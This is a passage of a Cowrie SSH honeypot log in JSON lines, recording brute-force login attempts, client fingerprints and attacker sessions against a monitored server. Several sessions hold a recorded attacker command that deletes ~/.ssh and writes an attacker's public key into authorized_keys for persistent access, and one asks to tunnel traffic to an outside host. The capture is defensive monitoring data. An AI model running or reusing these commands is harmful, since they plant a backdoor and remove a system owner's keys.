client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:37:34.330573Z","src_ip":"216.107.136.92","session":"a107ef53711b"}
{"eventid":"cowrie.login.failed","username":"manager","password":"abc123","message":"login attempt [manager/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T20:37:34.731603Z","src_ip":"216.107.136.92","session":"a107ef53711b"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:37:35.824018Z","src_ip":"216.107.136.92","session":"a107ef53711b"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":39334,"dst_ip":"1.2.3.4","dst_port":22,"session":"406a53bed79d","protocol":"ssh","message":"New connection: 216.107.136.92:39334 (1.2.3.4:22) [session: 406a53bed79d]","sensor":"my-vps","timestamp":"2025-09-08T20:39:18.593488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:39:18.594211Z","src_ip":"216.107.136.92","session":"406a53bed79d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:39:18.684973Z","src_ip":"216.107.136.92","session":"406a53bed79d"}
{"eventid":"cowrie.login.failed","username":"tester","password":"1234567890","message":"login attempt [tester/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T20:39:19.086951Z","src_ip":"216.107.136.92","session":"406a53bed79d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:39:20.180899Z","src_ip":"216.107.136.92","session":"406a53bed79d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":17584,"dst_ip":"1.2.3.4","dst_port":22,"session":"58baa62c2ba7","protocol":"ssh","message":"New connection: 212.227.125.160:17584 (1.2.3.4:22) [session: 58baa62c2ba7]","sensor":"my-vps","timestamp":"2025-09-08T20:39:39.220744Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:39:39.221966Z","src_ip":"212.227.125.160","session":"58baa62c2ba7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":17845,"dst_ip":"1.2.3.4","dst_port":22,"session":"83d415d2cd4f","protocol":"ssh","message":"New connection: 212.227.125.160:17845 (1.2.3.4:22) [session: 83d415d2cd4f]","sensor":"my-vps","timestamp":"2025-09-08T20:39:39.333812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T20:39:39.334825Z","src_ip":"212.227.125.160","session":"83d415d2cd4f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T20:39:39.448024Z","src_ip":"212.227.125.160","session":"83d415d2cd4f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:39:39.790567Z","src_ip":"212.227.125.160","session":"83d415d2cd4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T20:39:39.904814Z","session":"83d415d2cd4f"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:40:49.335841Z","src_ip":"212.227.125.160","session":"83d415d2cd4f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57076,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5610e4d8385","protocol":"ssh","message":"New connection: 217.72.205.35:57076 (1.2.3.4:22) [session: a5610e4d8385]","sensor":"my-vps","timestamp":"2025-09-08T20:44:07.745783Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:44:07.746858Z","src_ip":"217.72.205.35","session":"a5610e4d8385"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":48900,"dst_ip":"1.2.3.4","dst_port":22,"session":"0df0d92ada2d","protocol":"ssh","message":"New connection: 216.107.136.92:48900 (1.2.3.4:22) [session: 0df0d92ada2d]","sensor":"my-vps","timestamp":"2025-09-08T20:44:36.447192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:44:36.448082Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:44:36.548381Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.login.success","username":"root","password":"password99","message":"login attempt [root/password99] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:44:36.949947Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:44:37.188423Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:44:37.189152Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:44:37.190054Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:44:37.281031Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:44:37.477793Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:44:37.478506Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:44:37.570590Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:44:37.571473Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":45758,"dst_ip":"1.2.3.4","dst_port":22,"session":"89bf31ba21d0","protocol":"ssh","message":"New connection: 216.107.136.92:45758 (1.2.3.4:22) [session: 89bf31ba21d0]","sensor":"my-vps","timestamp":"2025-09-08T20:44:44.671859Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:44:44.672832Z","src_ip":"216.107.136.92","session":"89bf31ba21d0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:44:44.763221Z","src_ip":"216.107.136.92","session":"89bf31ba21d0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:44:45.169380Z","src_ip":"216.107.136.92","session":"89bf31ba21d0"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:44:45.264948Z","src_ip":"216.107.136.92","session":"0df0d92ada2d"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:44:45.266083Z","src_ip":"216.107.136.92","session":"89bf31ba21d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45895,"dst_ip":"1.2.3.4","dst_port":23,"session":"f4563dc59557","protocol":"telnet","message":"New connection: 212.227.235.229:45895 (1.2.3.4:23) [session: f4563dc59557]","sensor":"my-vps","timestamp":"2025-09-08T20:45:16.055268Z"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":40960,"dst_ip":"1.2.3.4","dst_port":22,"session":"22164b39cf32","protocol":"ssh","message":"New connection: 216.107.136.92:40960 (1.2.3.4:22) [session: 22164b39cf32]","sensor":"my-vps","timestamp":"2025-09-08T20:46:23.806844Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:46:23.807527Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:46:23.897550Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.login.success","username":"root","password":"wsxqaz123","message":"login attempt [root/wsxqaz123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:46:24.298850Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:46:24.527293Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:46:24.528104Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:46:24.529262Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:46:24.620937Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:46:24.860075Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:46:24.860785Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:46:24.952442Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:46:24.953352Z","src_ip":"216.107.136.92","session":"22164b39cf32"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":40968,"dst_ip":"1.2.3.4","dst_port":22,"session":"753502a7e56a","protocol":"ssh","message":"New connection: 216.107.136.92:40968 (1.2.3.4:22) [session: 753502a7e56a]","sensor":"my-vps","timestamp":"2025-09-08T20:46:25.041920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:46:25.042776Z","src_ip":"216.107.136.92","session":"753502a7e56a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:46:25.132875Z","src_ip":"216.107.136.92","session":"753502a7e56a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:46:25.535432Z","src_ip":"216.107.136.92","session":"753502a7e56a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:46:26.628434Z","src_ip":"216.107.136.92","session":"753502a7e56a"}
{"eventid":"cowrie.session.connect","src_ip":"216.107.136.92","src_port":40970,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c1f5bf6eb16","protocol":"ssh","message":"New connection: 216.107.136.92:40970 (1.2.3.4:22) [session: 7c1f5bf6eb16]","sensor":"my-vps","timestamp":"2025-09-08T20:46:26.726996Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:46:26.728111Z","src_ip":"216.107.136.92","session":"7c1f5bf6eb16"}
